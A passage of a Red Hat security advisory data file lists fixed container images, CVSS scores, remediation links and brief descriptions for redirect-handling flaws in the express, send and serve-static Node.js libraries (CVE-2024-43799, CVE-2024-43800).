"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", 